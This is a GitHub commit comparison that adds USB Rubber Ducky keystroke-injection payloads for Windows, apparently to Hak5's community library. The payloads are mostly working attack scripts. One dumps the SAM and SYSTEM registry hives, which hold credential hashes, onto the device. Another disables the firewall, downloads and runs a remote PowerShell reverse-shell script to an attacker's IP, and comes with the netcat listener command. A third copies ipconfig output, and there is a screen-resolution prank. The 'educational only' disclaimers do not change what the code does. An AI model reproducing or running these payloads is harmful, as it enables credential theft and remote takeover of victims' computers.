Compare commits

...

23 Commits

Author SHA1 Message Date
MajoesQ 042acc1f62
Merge 13e7756d1e into 44af31e74b 2024-10-25 15:06:46 +00:00
Peaks 44af31e74b
Merge pull request #481 from mavisinator30001/master
Create Resolution_Prank.txt
2024-10-24 15:30:26 -04:00
Mavis Coffey cacb21ad7e
Removed Second "#DRIVELABEL" variable 2024-10-24 14:58:57 -04:00
Mavis Coffey 61eb88ab6c
Update payload.txt 2024-10-22 14:41:32 -04:00
Mavis Coffey 8be0f9a092
Delete payloads/library/credentials/IP-Out directory 2024-10-21 11:57:10 -04:00
Mavis Coffey 63e0c18618
Create README.md 2024-10-21 11:56:43 -04:00
Mavis Coffey 81807425f5
Create payload.txt 2024-10-21 11:56:10 -04:00
Mavis Coffey 083951025f
Added System-Stealer to exfiltration library 2024-10-18 14:43:32 -04:00
Mavis Coffey 1a5aa0bd08
Update payload.txt 2024-10-18 11:26:00 -04:00
Mavis Coffey a323fc3281
Update payload.txt 2024-10-15 14:10:08 -04:00
Mavis Coffey 420a174f93
Rename readme.md to README.md 2024-09-26 07:42:38 -07:00
Mavis Coffey c8c6a75d33
Rename readme.md to README.md 2024-09-26 07:42:03 -07:00
Mavis Coffey 4e89426355
Create readme.md 2024-09-26 06:29:23 -07:00
Mavis Coffey 566683c428
Update payload.txt 2024-09-26 06:25:51 -07:00
Mavis Coffey 5ed41467e3
Update payload.txt 2024-09-26 06:24:22 -07:00
Mavis Coffey a74d21e848
Create readme.md 2024-09-26 06:16:19 -07:00
Mavis Coffey 0f85a6936e
Update payload.txt 2024-09-26 06:09:19 -07:00
Mavis Coffey d9baab6395
Merge branch 'hak5:master' into master 2024-09-26 09:05:47 -04:00
Mavis Coffey cf0c83d37c
Update and rename Resolution_Prank.txt to payload.txt
Changed author name to my username rather than real name. Changed payload file name to payload.txt
2024-09-20 08:30:00 -07:00
Mavis Coffey 8293bf5d4d
Update payload.txt
Changed author comment to display my username rather than my real name
2024-09-20 08:28:44 -07:00
Mavis Coffey 6ad0b7836c
Create payload.txt
Added IP-Out Ducky payload
2024-09-20 08:25:58 -07:00
mavisinator30001 8073d4d9cd
Create Resolution_Prank.txt
Added Resolution_Prank folder and related payload into said folder
2024-09-18 07:30:59 -07:00
MajoesQ 13e7756d1e
REVERSE_SHELLQ
Props: Majoesq
Targets: Windows 11/10 
Attacker: Kali Linux
Description: REVERSE_SHELLQ Disables Windows Firewall
Creates Reverse Shell |USING POWERSHELL|
USE ON YOUR OWN RISK
2023-12-23 11:33:07 +01:00
6 changed files with 298 additions and 0 deletions

View File

@ -0,0 +1,12 @@
# IP-OUT
This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
## Useful Tips
**Change #DRIVELABEL to your own personal drive label if it isn't already**
Remember: Do not use this for unethical hacking practices! This is for educational purposed only!

View File

@ -0,0 +1,63 @@
REM Title: IP-Out
REM Author: Mavisinator30001
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
REM Target: Any Windows System
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
DEFINE #DRIVELABEL DUCKY
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
IF $_OS != WINDOWS
STOP_PAYLOAD
END_IF
ATTACKMODE HID STORAGE
DELAY 500
GUI r
DELAY 300
STRINGLN Powershell
DELAY 1000
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
ALT F4
ATTACKMODE OFF
HIDE_PAYLOAD

View File

@ -0,0 +1,74 @@
REM TITLE System Stealer
REM AUTHOR mavisinator30001
REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both
REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
REM DISCLAIMER This is for educational purposes ONLY
DELAY 1000
ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Change $DRIVELABEL to the storage label of your duck
DEFINE #DRIVELABEL DUCKY
IF ($_OS == WINDOWS) THEN
GUI r
DELAY 500
STRING powershell
DELAY 1000
CTRL-SHIFT-ENTER
DELAY 750
LEFT
ENTER
DELAY 1000
STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
DELAY 250
STRINGLN reg save HKLM\sam $DriveLetter/sam.save
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
STRINGLN reg save HKLM\system $DriveLetter/system.save
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
ALT F4
ELSE
ATTACKMODE OFF
STOP_PAYLOAD
END_IF

View File

@ -0,0 +1,5 @@
# Resolution Prank
This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
### Somewhat resource dependent, may not work on older computers

View File

@ -0,0 +1,103 @@
REM TITLE Resolution Prank
REM AUTHOR Mavisinator30001
REM TARGET Any system running Windows 10/11
REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
IF $_OS != WINDOWS
STOP_PAYLOAD
END_IF
LED_G
DELAY 500
CTRL GUI d
DELAY 500
GUI i
DELAY 2000
STRINGLN display
DELAY 2500
TAB
ENTER
DELAY 200
REPEAT 8 TAB
ENTER
VAR $CAPS_STATE = $_CAPSLOCK_ON
WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
HOLD DOWN
DELAY 1000
RELEASE DOWN
ENTER
DELAY 200
LEFT
DELAY 200
ENTER
REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
VAR $LIGHT_UP_TIMES = 20
WHILE ($LIGHT_UP_TIMES > 0)
LED_G
DELAY 300
LED_OFF
DELAY 300
LED_R
DELAY 300
LED_OFF
DELAY 300
$LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
END_WHILE
WAIT_FOR_CAPS_CHANGE
END_WHILE
DELAY 300
REPEAT 12 TAB
ENTER
DELAY 200
HOLD UP
DELAY 1000
RELEASE UP
ENTER
DELAY 200
LEFT
ENTER
DELAY 1000
ALT F4
DELAY 200
CTRL GUI F4

View File

@ -0,0 +1,41 @@
REM #########################################################################################################################
REM Title: REVERSE_SHELLQ
REM Description: Disables Windows Firewall And Starts A Minimized Reverse Shell
REM Props: MajoesQ
REM Targets: Windows 10/11 {TESTED ON WINDOWS 11/10}
REM MajoesQ ASSUMES NO RESPONSIBILITY FOR ANY DAMAGES OR STOLEN DATA "USE AT YOUR OWN RISK"
REM DON'T FORGET TO START LISTENER "stty raw -echo; (stty size; cat) | nc -lvnp PORT ATACKERS_IP {FOR LINUX}
REM DON'T FORGET TO CHANGE ATACKERS IP AND PORT IN LINE 25
REM DON'T FORGET TO ENCODE AT "https://payloadstudio.hak5.org/community/"
REM #########################################################################################################################
REM ENJOY :}
DELAY 1000
GUI x
DELAY 500
STRING a
DELAY 500
LEFT
DELAY 500
ENTER
DELAY 500
STRING netsh advfirewall set allprofiles state off
DELAY 600
ENTER
DELAY 1000
STRING IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell IP PORT
DELAY 1000
ENTER
ALT SPACE
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
ENTER
CAPSLOCK
END
REM This is the end #################################################################################################################################################